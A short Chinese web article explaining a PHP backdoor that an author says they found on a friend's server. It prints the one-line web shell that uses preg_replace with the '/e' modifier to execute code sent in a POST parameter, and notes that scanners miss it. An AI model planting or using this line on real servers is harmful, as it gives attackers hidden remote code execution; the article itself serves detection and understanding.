利用preg_replace隐藏后门原理是什么
在一次帮助朋友检查服务器的时候,竟然发现这样的恶意代码,利用各种查找后门的工具都没有发现php木马。怎么回事呢?有可能是某人利用preg_replace隐藏后门,感兴趣的朋友下面一起看看!
方法步骤
通过分析发现,小黑的访问的文件发现代码:
@preg_replace(“//e”,$_POST['IN_COMSENZ'],”Access Denied”);
如果你看到这个代码是不是有的也没什么问题,但是,这个就是小黑的掩藏的恶意代码和后门。隐蔽吧,基本上任何查杀软件都查杀不到。
请关闭浏览器的畅读模式或者取消屏蔽JavaScript的正常运行,避免出现内容显示不全或者段落错乱。
原网页地址:https://www.zwi3.net/xuexi/4016763.html